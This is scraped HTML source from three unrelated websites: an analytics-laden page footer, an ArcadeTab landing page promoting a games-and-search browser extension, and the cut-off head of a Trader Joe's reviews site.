{"linkData":[],"siteURL":"https:\/\/listovative.com","siteURLq":"https:\/\/listovative.com"}; /* ]]> */ </script> <script type="text/javascript" src="https://listovative.com/wp-content/cache/minify/668cc.js"></script> <!-- Start of StatCounter Code for Default Guide --> <script type="text/javascript"> var sc_project=9954888; var sc_invisible=1; var sc_security="2b51b727"; var scJsHost = (("https:" == document.location.protocol) ? "https://secure." : "http://www."); document.write("<sc"+"ript type='text/javascript' src='" + scJsHost+ "statcounter.com/counter/counter.js'></"+"script>"); </script> <noscript><div class="statcounter"><a title="free web stats" href="http://statcounter.com/free-web-stats/" target="_blank"><img class="statcounter" src="https://c.statcounter.com/9954888/0/2b51b727/1/" alt="free web stats"></a></div></noscript> <!-- End of StatCounter Code for Default Guide --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-54887900-1', 'auto'); ga('send', 'pageview'); </script> <script type="text/javascript"> window._taboola = window._taboola || []; _taboola.push({flush: true}); </script> </body> </html> <!-- Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/ Page Caching using disk: enhanced Minified using disk Served from: listovative.com @ 2019-05-16 15:11:13 by W3 Total Cache -->
0
<!doctype html> <!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8"> <![endif]--> <!--[if IE 8]> <html class="no-js lt-ie9"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en"> <!--<![endif]--> <head> <meta charset="utf-8"> <title>ARCADETAB - FREE ONLINE GAMES</title> <link href='https://fonts.googleapis.com/css?family=Roboto' rel='stylesheet' type='text/css'> <!-- for Mobile Devices... https://developer.mozilla.org/en/Mobile/Viewport_meta_tag/ --> <link rel="alternate" type="application/rss+xml" title="arcadetab.com Feed" href="https://arcadetab.com/feed/"> <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet"> <!-- base css files --> <!-- base script files --> <!--<div class="menu-primary-navigation-container"><ul id="menu-primary-navigation" class="menu cf"><li id="menu-item-7" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7"><a href="/sample-page/">Sample Page</a></li> <li id="menu-item-10" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10"><a href="/sample-page/">Sample Page</a></li> <li id="menu-item-15" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-15"><a href="/home-2/">ARCADE TAB</a></li> <li id="menu-item-16" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-16"><a href="/sample-page/">Sample Page</a></li> <li id="menu-item-18" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18"><a href="/home-2/">ARCADE TAB</a></li> <li id="menu-item-19" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-19"><a href="/sample-page/">Sample Page</a></li> <li id="menu-item-21" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21"><a href="/home-2/">ARCADE TAB</a></li> <li id="menu-item-22" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22"><a href="/sample-page/">Sample Page</a></li> <li id="menu-item-26" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-26"><a href="/home-2/">ARCADE TAB</a></li> <li id="menu-item-27" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-27"><a href="/sample-page/">Sample Page</a></li> </ul></div>--> <!-- wp_head() --> <!-- This site is optimized with the Yoast WordPress SEO plugin v1.4.7 - http://yoast.com/wordpress/seo/ --> <meta name="description" content="Play free games online from your PC. Play Pacman, Tetris and many more."/> <link rel="canonical" href="https://arcadetab.com/" /> <meta property='og:locale' content='en_US'/> <meta property='og:type' content='article'/> <meta property='og:title' content='ARCADETAB - FREE ONLINE GAMES'/> <meta property='og:description' content='Play free games online from your PC. Play Pacman, Tetris and many more.'/> <meta property='og:url' content='https://arcadetab.com/'/> <meta property='og:site_name' content='arcadetab.com'/> <meta property='og:image' content='https://arcadetab.com/assets/ChromeWebStore_Badge.png'/> <meta property='og:image' content='https://arcadetab.com/assets/logolong.png'/> <meta property='og:image' content='https://arcadetab.com/assets/steps-arrow.png'/> <meta property='og:image' content='https://arcadetab.com/assets/tr-t.png'/> <meta property='og:image' content='https://arcadetab.com/assets/webserch.png'/> <!-- / Yoast WordPress SEO plugin. --> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/72x72\/","ext":".png","source":{"concatemoji":"https:\/\/arcadetab.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.4.1"}}; !function(a,b,c){function d(a){var c,d=b.createElement("canvas"),e=d.getContext&&d.getContext("2d");return e&&e.fillText?(e.textBaseline="top",e.font="600 32px Arial","flag"===a?(e.fillText(String.fromCharCode(55356,56806,55356,56826),0,0),d.toDataURL().length>3e3):"diversity"===a?(e.fillText(String.fromCharCode(55356,57221),0,0),c=e.getImageData(16,16,1,1).data.toString(),e.fillText(String.fromCharCode(55356,57221,55356,57343),0,0),c!==e.getImageData(16,16,1,1).data.toString()):("simple"===a?e.fillText(String.fromCharCode(55357,56835),0,0):e.fillText(String.fromCharCode(55356,57135),0,0),0!==e.getImageData(16,16,1,1).data[0])):!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g;c.supports={simple:d("simple"),flag:d("flag"),unicode8:d("unicode8"),diversity:d("diversity")},c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.simple&&c.supports.flag&&c.supports.unicode8&&c.supports.diversity||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='boilerplate-normalize-css' href='https://arcadetab.com/wp-content/themes/ace-of-baseinstall/vendor/boilerplate/css/normalize.min.css?ver=4.4.1' type='text/css' media='all' /> <link rel='stylesheet' id='boilerplate-main-css' href='https://arcadetab.com/wp-content/themes/ace-of-baseinstall/vendor/boilerplate/css/main.css?ver=4.4.1' type='text/css' media='all' /> <link rel='stylesheet' id='addon-css' href='https://arcadetab.com/wp-content/themes/ace-of-baseinstall/vendor/bootstrap/css/addon.css?ver=4.4.1' type='text/css' media='all' /> <script type='text/javascript' src='https://arcadetab.com/wp-content/themes/ace-of-baseinstall/vendor/boilerplate/js/modernizr-2.6.2-respond-1.1.0.min.js?ver=4.4.1'></script> <script type='text/javascript' src='https://code.jquery.com/jquery-1.9.1.min.js?ver=1.9.1'></script> <link rel='https://api.w.org/' href='https://arcadetab.com/wp-json/' /> <script type="text/javascript"> setTimeout(function(){var a=document.createElement("script"); var b=document.getElementsByTagName("script")[0]; a.src=document.location.protocol+"//script.crazyegg.com/pages/scripts/0011/0241.js?"+Math.floor(new Date().getTime()/3600000); a.async=true;a.type="text/javascript";b.parentNode.insertBefore(a,b)}, 1); </script> <!-- Start 7Tag script code --><script src="//containers.arcadetab.com/215.sync.js"></script><!-- End Tag script code --><style> .mainheader, footer, nav{display:none!important;} /***********************Disclosure**************************/ .i-search { display: block; width: 320px; box-sizing: border-box; border: 0px solid #cdcdcd; position: fixed; overflow: hidden; padding: 10px; border-radius: 5px; bottom: 10px; left: 10px; background: rgba(0,0,0,0.5); text-align: left; color: #808080; } .i-search img { width: 300px; /* position: absolute; */ bottom: 0px; } .i-search p { /* padding-left: 210px; */ font-size: 11px; margin: 0px; } /**********************Browser detection css*************************/ @-moz-document url-prefix() { .chromeOnly { display: none!important; } .firefoxOnly{ display: block!important; } } .firefoxOnly{display: none;} .chromeOnly, .firefoxOnly{ display: block position: absolute; min-height: calc(100vh); min-height: -webkit-calc(100vh); width: 100%; } /**********************Firefox addon****************************/ .ff-logo{ width: 200px; display:block; margin: 0 auto; padding-top: 10px; } .ff-logo img{ width: 100%; } .ff-btn{ width: 450px!important; } /********************lightbox hacks*********************/ #lightbox{ background: rgba(0, 0, 0, .8)!important; } html { background: url(/assets/arcade-full.jpg) no-repeat center center fixed; -webkit-background-size: cover; -moz-background-size: cover; -o-background-size: cover; background-size: cover; } body{ padding:0; margin:0; font-family: 'Roboto', sans-serif; background: transparent!important; } h1,h2,h3{ font-family: 'Open Sans', sans-serif!important; } /*********Disclaimer********/ .br { display: block; position: absolute; color: #808080; font-size: 12px; text-align: right; bottom: 20px; right: 20px; background: rgba(0,0,0,0.6); padding: 10px; border-radius: 5px; } .br img{ width: 120px; } .br a{ color:#808080; text-decoration: none; } /*******header*******/ .cws-header{ display:block; position: fixed; background: #fff; width:100%; height: 64px; z-index: 99; -webkit-box-shadow: 0 2px 6px 0 rgba(0,0,0,0.12); box-shadow: 0 2px 6px 0 rgba(0,0,0,0.12); } .inner{ display:block; max-width: 1200px; margin: 0 auto; } .cws-badge { display: inline-block; width: 200px; cursor: pointer; } .cws-badge img{ width: 100%; } .cws-header .logo{ display: inline-block; float: right; width: 200px; padding-top: 20px; padding-right: 10px; /* filter: grayscale(100%);*/ } /*******cws-btn*******/ .cws-btn{ background-color: #08bb3f; color: #fff; font-size: 14px; letter-spacing: 1px; width: 150px; height: 36px; text-align:center; box-sizing:border-box; padding-top: 10px; font-weight: bold; border-radius: 5px; cursor: pointer; transition: all .2s ease; box-shadow: 0 1px 3px rgba(0,0,0,0.12), 0 1px 2px rgba(0,0,0,0.24); transition: all 0.3s cubic-bezier(.25,.8,.25,1); } .cws-btn:hover{ transform: scale(1.2); box-shadow: 0 14px 28px rgba(0,0,0,0.25), 0 10px 10px rgba(0,0,0,0.22); } /*******Directions*******/ .directions{ display:block; padding-top:100px; width:100%; } .directions h1{ text-align: center; font-size: 65px; font-weight: lighter; color: #555!important; } .directions p{ text-align: center; font-size: 24px; /*font-weight: bold;*/ color: #555!important; } .directions .cws-btn{ margin: 0 auto; width: 300px!important; padding: 20px 0px!important; font-size: 40px; height: auto!important; margin-top: 80px!important; } /*******bounch up********/ @keyframes bounce-up { 0%, 20%, 50%, 80%, 100% { -webkit-transform: translateY(0); } 40% { -webkit-transform: translateY(-20px); } 60% { -webkit-transform: translateY(-5px); } } /******************************Steps***********************/ .steps { display: block; position: relative; width: 400px; height: 90px; margin: 0 auto; } .steps img{ width: 100%; } .steps .step{ display: block; position: absolute; top: 0px; width:130px; height: 128px; text-align:center; color: #555; line-height: 150%; padding-top: 15px; font-size:13px; } .steps .one{left:0px;} .steps .two{left:135px;} .steps .three{left:270px;} .steps .step strong{ font-size: 20px; color:#555; } .step span{ font-size:12px!important; } .dtext{ display:block; text-align: center; color;#555; padding-bottom:50px; font-size: 20px; padding-top: 5px; } .i-search { display: block; width: 320px; box-sizing: border-box; border: 0px solid #cdcdcd; position: fixed; overflow: hidden; padding: 10px; border-radius: 5px; bottom: 10px; left: 10px; background: rgba(0,0,0,0.5); text-align: left; color: #808080; } .i-search img { width: 300px; } .i-search p { font-size: 11px; margin: 0px; } .br { display: block; position: absolute; color: #808080; font-size: 12px; text-align: right; bottom: 20px; right: 20px; background: rgba(0,0,0,0.6); padding: 10px; border-radius: 5px; } .br a { color: #808080; text-decoration: none; } /*******bounch left********/ @keyframes bounce-left { 0%, 20%, 50%, 80%, 100% { -webkit-transform: translateX(0); } 40% { -webkit-transform: translateX(-20px); } 60% { -webkit-transform: translateX(-5px); } } </style><!-- Stream WordPress user activity plugin v3.0.7 --> <link rel="canonical" href="https://arcadetab.com/"> <link rel="icon" href="/assets/cropped-48-32x32.png" sizes="32x32" /> <link rel="icon" href="/assets/cropped-48-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="/assets/cropped-48-180x180.png" /> <meta name="msapplication-TileImage" content="/assets/cropped-48-270x270.png" /> <!-- /wp_head() --> <!--<div class="fulid-container topmenu"> <div class="row"> <div class="col-md-6 logo"><a href="/?landing_page=19-2"><img src="/assets/128.png" alt="ArcadeTab Logo" title="ArcadeTab.com Logo"/></a></div> <div class="col-md-6 lmenu"> <div class="row"> <div class="col-md-4"></div> <div class="col-md-5"><a href="#">End User License Agreement</a></div> <div class="col-md-3"><a href="#">Privacy Policy</a></div> </div> </div> </div> </div>--> <div class="row mainheader" style="padding:20px 0px"> <div class="center"> <div class="col-md-12"> <div class="Htop"><a href="/"><img src="/assets/128.png" alt="ArcadeTab Logo" title="ArcadeTab.com Logo"/ height="50"></a></div> <div class="Htop Pname">Arcade Tab</div> <div class="Htop Pdes"><strong>Play Classic Arcade Games in your browser for free with ArcadeTab</strong></div> </div> </div> <hr> </div> </head> <!--[if !IE]><!--><body id="notIE" class="home page page-id-489 page-template-default arcade-tab-search"><!--<![endif]--> <!--[if gt IE 8]><!--> <body id="IE" class="home page page-id-489 page-template-default arcade-tab-search"> <!--<![endif]--> <!--[if IE 8]><body id="ie8" class="home page page-id-489 page-template-default arcade-tab-search"><![endif]--> <!--[if lt IE 8]> <p class="chromeframe">You are using an outdated browser. <a href="http://browsehappy.com/">Upgrade your browser today</a> or <a href="http://www.google.com/chromeframe/?redirect=true">install Google Chrome Frame</a> to better experience this site.</p> <![endif]--> <!-- make sure to close header in your template --> <link rel="stylesheet" href="/wp-content/themes/ace-of-baseinstall/vendor/bootstrap/css/bootstrap.min.css"> <!--[if !IE]><!--><body id="notIE" class="home page page-id-489 page-template-default arcade-tab-search"><!--<![endif]--> <!--[if gt IE 8]><!--> <body id="IE" class="home page page-id-489 page-template-default arcade-tab-search"> <!--<![endif]--> <!--[if IE 8]><body id="ie8" class="home page page-id-489 page-template-default arcade-tab-search"><![endif]--> <!--[if IE 7]><body id="ie7" class="home page page-id-489 page-template-default arcade-tab-search"><![endif]--> <!--[if IE 6]><body id="ie6" class="home page page-id-489 page-template-default arcade-tab-search"><![endif]--> <!------------------------------------------------------------------Chrome Only-----------------------------------------------------------------> <div class="chromeOnly" <!--CWS header--> <div class="cws-header "> <div class="inner"> <div class="cws-badge st2 " onclick="return triggerInstall(this);"><img src="/assets/ChromeWebStore_Badge.png"></div> <img src="/assets/logolong.png" class="logo"> </div> </div> <!--End of CWS header--> <!--continue--> <div class="directions"> <h1>ArcadeTab Search</h1> <p>Access FREE Online Games<p> <div class="cws-btn start st2" onclick="return triggerInstall(this);">Continue <i class="fa fa-arrow-circle-o-right" aria-hidden="true"></i> </div> </div> <!--End of Continue-----> <!-----Steps ----> <div class="dtext"> Step 1 of 3 </div> <div class="steps"> <img src="/assets/steps-arrow.png"> <div class="step one"> <strong>Step1</strong><br> Click<br>Continue </div> <div class="step two"> <strong>Step2</strong><br> Click<br>Add to Chrome </div> <div class="step three"> <strong>Step3</strong><br> Start<br>Arcadetab </div> </div> <!---End of setps -----> <!------Disclaimer----> <div class="br"> <img src="/assets/tr-t.png" style="opacity: 0.5"> | <a href="/terms-of-service/" target="_blank">Terms</a> | <a href="/privacy-policy/" target="_blank">Privacy</a> | <a href="/uninstall/" target="_blank">Uninstall</a> <br> All trademarks are property of their respective owners </div> <!-- End of disclaimer--> <!-------End of override logo---------------> </div> <!------------------------------------------------------------------End Chrome Only-----------------------------------------------------------------> <!------------------------------------------------------------------Firefox Only-----------------------------------------------------------------> <div class="firefoxOnly"> <!--CWS heade--> <div class="cws-header"> <div class="inner"> <img src="/assets/logolong.png" class="logo" style="float:none; margin: 0 auto; display:block;"> </div> </div> <!--End of CWS header--> <!--continue ------> <div class="directions"> <h1>ArcadeTab Search</h1> <p>Access FREE Online Games<p> <div class="cws-btn start ff-btn" onclick="return triggerInstall(this);">Continue <i class="fa fa-arrow-circle-o-right" aria-hidden="true"></i> </div> </div> <!--End of-----> <!-----Steps ----> <div class="dtext"> Step 1 of 3 </div> <div class="steps"> <img src="/assets/steps-arrow.png" style="height: 115%;"> <div class="step one"> <strong>Step1</strong><br> Click<br>Continue </div> <div class="step two chromeOnly"> <strong>Step2</strong><br> Click<br>Add to Chrome </div> <div class="step two"> <strong>Step2</strong><br> Click<br><span>Allow and Follow<br>The Instructions</span> </div> <div class="step three"> <strong>Step3</strong><br> Start<br>Arcadetab </div> </div> <!---End of setps -----> <!------Disclaimer----> <div class="br"> Arcadetab.com | <a href="/terms-of-service/" target="_blank">Terms</a> | <a href="/privacy-policy/" target="_blank">Privacy</a> | <a href="/uninstall/" target="_blank">Uninstall</a> <br> All trademarks are property of their respective owners </div> <!-- End of disclaimer--> </div> <!------------------------------------------------------------------End Firefox Only-----------------------------------------------------------------> <!----------------------Disclosure-------------------------> <div class="i-search chrome-s"> <img src="/assets/webserch.png"> <p>Search by Arcadetab extension sets your browser search to Yahoo. Games features are available on arcadetab.com after adding the extension.</p> </div> <!------------------------------------------------------------------Audio Script---------------------------------------------> <script> //audio $(document).ready(function() { var obj = document.createElement("audio"); obj.src="/assets/st2.mp3"; obj.volume=0.10; obj.autoPlay=false; obj.preLoad=true; var obj3 = document.createElement("audio"); obj3.src="/assets/ff.mp3"; obj3.volume=0.10; obj3.autoPlay=false; obj3.preLoad=true; $(".st2").click(function() { obj.play(); }); $(".ff-btn").click(function() { obj3.play(); }); }); //browser detection if( navigator.userAgent.toLowerCase().indexOf('chrome') > -1 ) { $(".chrome-s").show(); $(".firefox-s").hide(); } if( navigator.userAgent.toLowerCase().indexOf('firefox') > -1 ) { $(".chrome-s").hide(); $(".firefox-s").show(); } </script> <!-- Site wide footer (can be removed if customization is needed) --> <footer> <hr> <div class="footer-container"> <a href="/terms-of-service/">Terms of Service</a> <a href="/privacy-policy/">Privacy Policy</a> <a href="/contact-us/">Contact</a> <a href="/uninstall/">Uninstall</a> </div> </footer><!-- WP Footer --> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-MG7GK8');</script> <!-- End Google Tag Manager --><script type='text/javascript' src='https://arcadetab.com/wp-content/themes/ace-of-baseinstall/vendor/boilerplate/js/main.min.js?ver=4.4.1'></script> <script type='text/javascript' src='https://arcadetab.com/wp-includes/js/wp-embed.min.js?ver=4.4.1'></script> <script type='text/javascript' src='https://arcadetab.com/wp-content/themes/ace-of-baseinstall/vendor/bootstrap/js/smoothy.js?ver=4.4.1'></script> </body> </html>
0
<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <!-- Meta Tags --> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <!-- Title & Desc. --> <title>Trader Joe&#039;s Reviews, Recipes, and MoreTrader Joe&#039;s Reviews</title> <meta name="description" content="Trader Joe&#039;s Reviews, Recipes, Locations, and More." /> <!-- Link Tags --> <link rel="shortcut icon" href="http://www.tjsreviews.com/wp-content/uploads/2014/03/asparagus-150x150.jpg" type="image/x-icon" /><link rel="alternate" type="application/rss+xml" title="Trader Joe&#039;s Reviews RSS2 Feed" href="http://www.traderjoesreviews.com/feed/" /> <link rel="pingback" href="http://www.traderjoesreviews.com/xmlrpc.php" /> <script type="text/javascript"> var mysiteurl = "http://www.traderjoesreviews.com/wp-content/themes/circolare"; </script> <!-- JS and CSS --> <!-- This site is optimized with the Yoast SEO plugin v5.5.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Trader Joe&#039;s Reviews, Recipes, Recalls, Locations, Hours, Return Policy, and more. Read Trader Joe&#039;s product reviews and add your own!"/> <link rel="canonical" href="http://www.traderjoesreviews.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Trader Joe&#039;s Reviews, Recipes, and More" /> <meta property="og:description" content="Trader Joe&#039;s Reviews, Recipes, Recalls, Locations, Hours, Return Policy, and more. Read Trader Joe&#039;s product reviews and add your own!" /> <meta property="og:url" content="http://www.traderjoesreviews.com/" /> <meta property="og:site_name" content="Trader Joe&#039;s Reviews" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Trader Joe&#039;s Reviews, Recipes, Recalls, Locations, Hours, Return Policy, and more. Read Trader Joe&#039;s product reviews and add your own!" /> <meta name="twitter:title" content="Trader Joe&#039;s Reviews, Recipes, and More" /> <script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","@id":"#website","url":"http:\/\/www.traderjoesreviews.com\/","name":"Trader Joe&#039;s Reviews","alternateName":"TJ's Reviews","potentialAction":{"@type":"SearchAction","target":"http:\/\/www.traderjoesreviews.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"Organization","url":"http:\/\/www.traderjoesreviews.com\/","sameAs":[],"@id":"#organization","name":"Trader Joe's Reviews","logo":""}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Trader Joe&#039;s Reviews &raquo; Feed" href="http://www.traderjoesreviews.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Trader Joe&#039;s Reviews &raquo; Comments Feed" href="http://www.traderjoesreviews.com/comments/feed/" /> <link rel="alternate" type="application/rss+xml" title="Trader Joe&#039;s Reviews &raquo; Homepage Comments Feed" href="http://www.traderjoesreviews.com/homepage/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.traderjoesreviews.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=37fbe8ade72fb6e60f14c0c9992cfe64"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='http://www.traderjoesreviews.com/wp-includes/css/dist/block-library/style.min.css?ver=37fbe8ade72fb6e60f14c0c9992cfe64' type='text/css' media='all' /> <link rel='stylesheet' id='rs-plugin-settings-css' href='http://www.traderjoesreviews.com/wp-content/plugins/revslider/rs-plugin/css/settings.css?rev=4.6.0&#038;ver=37fbe8ade72fb6e60f14c0c9992cfe64' type='text/css' media='all' /> <link rel='stylesheet' id='woocommerce-layout-css' href='//www.traderjoesreviews.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=2.6.11' type='text/css' media='all' /> <link rel='stylesheet' id='woocommerce-smallscreen-css' href='//www.traderjoesreviews.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=2.6.11' type='text/css' media='only screen and (max-width: 768px)' /> <link rel='stylesheet' id='woocommerce-general-css' href='//www.traderjoesreviews.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=2.6.11' type='text/css' media='all' /> <link rel='stylesheet' id='main-css' href='http://www.traderjoesreviews.com/wp-content/themes/circolare/style.css?ver=1' type='text/css' media='all' /> <link rel='stylesheet' id='b-theme-css' href='http://www.traderjoesreviews.com/wp-content/themes/circolare/css/main.css?ver=1' type='text/css' media='all' /> <link rel='stylesheet' id='b-skin-css' href='http://www.traderjoesreviews.com/wp-content/themes/circolare/css/brown.css?ver=1' type='text/css' media='all' /> <link rel='stylesheet' id='b-uiskin-css' href='http://www.traderjoesreviews.com/wp-content/themes/circolare/jqueryui/css/redmond-brown/style.css?ver=1' type='text/css' media='all' /> <link rel='stylesheet' id='b-uislider-css' href='http://www.traderjoesreviews.com/wp-content/themes/circolare/jqueryui/css/extras.css?ver=1' type='text/css' media='all' /> <link rel='stylesheet' id='b-flexi-css' href='http://www.traderjoesreviews.com/wp-content/themes/circolare/flexi/flexslider.css?ver=1' type='text/css' media='all' /> <link rel='stylesheet' id='woocommerce_frontend_styles-css' href='http://www.traderjoesreviews.com/wp-content/themes/circolare/woocommerce/style.css?ver=1' type='text/css' media='all' /> <link rel='stylesheet' id='b-mediaqueries-css' href='http://www.traderjoesreviews.com/wp-content/themes/circolare/css/media-queries.css?ver=1' type='text/css' media='all' /> <link rel='stylesheet' id='b-updates-css' href='http://www.traderjoesreviews.com/wp-content/themes/circolare/css/updates.css?ver=1' type='text/css' media='all' /> <script type='text/javascript' src='http://www.traderjoesreviews.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://www.traderjoesreviews.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='http://www.traderjoesreviews.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.tools.min.js?rev=4.6.0&#038;ver=37fbe8ade72fb6e60f14c0c9992cfe64'></script> <script type='text/javascript' src='http://www.traderjoesreviews.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?rev=4.6.0&#038;ver=37fbe8ade72fb6e60f14c0c9992cfe64'></script> <link rel='https://api.w.org/' href='http://www.traderjoesreviews.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.traderjoesreviews.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.traderjoesreviews.com/wp-includes/wlwmanifest.xml" /> <link rel='shortlink' href='http://www.traderjoesreviews.com/' /> <link rel="alternate" type="application/json+oembed" href="http://www.traderjoesreviews.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.traderjoesreviews.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="http://www.traderjoesreviews.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.traderjoesreviews.com%2F&#038;format=xml" /> <script type="text/javascript"> (function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var addEvent = function(evt, handler) { if (window.addEventListener) { document.addEventListener(evt, handler, false); } else if (window.attachEvent) { document.attachEvent('on' + evt, handler); } }; var removeEvent = function(evt, handler) { if (window.removeEventListener) { document.removeEventListener(evt, handler, false); } else if (window.detachEvent) { document.detachEvent('on' + evt, handler); } }; var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' '); var logHuman = function() { if (window.wfLogHumanRan) { return; } window.wfLogHumanRan = true; var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); for (var i = 0; i < evts.length; i++) { removeEvent(evts[i], logHuman); } }; for (var i = 0; i < evts.length; i++) { addEvent(evts[i], logHuman); } })('//www.traderjoesreviews.com/?wordfence_lh=1&hid=C30C76E465DAAFF2ED1C69D79EEF25B9'); </script><meta name="google-site-verification" content="KB7XHJ4ga1I86j9Ccr6nMTAjIMuAD-n3rIYYUJWlxXc" /><link href="//fonts.googleapis.com/css?family=Merriweather:400,700" rel="stylesheet" type="text/css"> <link href="//fonts.googleapis.com/css?family=Droid+Sans:400,700" rel="stylesheet" type="text/css"> <!-- Custom Styling --> <style type="text/css"> html, body {font-size: 15px; 